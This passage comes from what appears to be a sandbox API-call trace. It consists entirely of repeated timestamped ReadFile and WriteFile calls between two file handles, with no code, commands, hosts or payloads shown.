lpOverlapped=0x0) returned 1 [0023.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x233, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.131] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.154] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.161] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.165] WriteFile (in: hFile=0x2b4, 